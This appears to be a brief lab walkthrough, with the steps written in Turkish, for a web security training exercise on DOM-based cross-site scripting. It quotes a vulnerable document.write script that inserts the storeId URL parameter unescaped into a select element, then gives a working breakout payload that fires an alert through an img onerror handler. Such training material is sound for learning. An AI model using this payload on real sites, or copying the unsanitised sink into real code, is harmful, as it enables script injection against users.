-
Notifications
You must be signed in to change notification settings - Fork 0
/
10.txt
20 lines (17 loc) · 1.01 KB
/
10.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
LAB: DOM XSS in document.write sink using source location.search inside a select element
1 - Herhangi bir ürüne girerek stok sorgusu yapın, isteği Burp Suiteden yakalayın.
var stores = ["London","Paris","Milan"];
var store = (new URLSearchParams(window.location.search)).get('storeId');
document.write('<select name="storeId">');
if(store) {
document.write('<option selected>'+store+'</option>');
}
for(var i=0;i<stores.length;i++) {
if(stores[i] === store) {
continue;
}
document.write('<option>'+stores[i]+'</option>');
}
document.write('</select>');
2 -
productId=1&storeId="></select><img%20src=1%20onerror=alert(1)>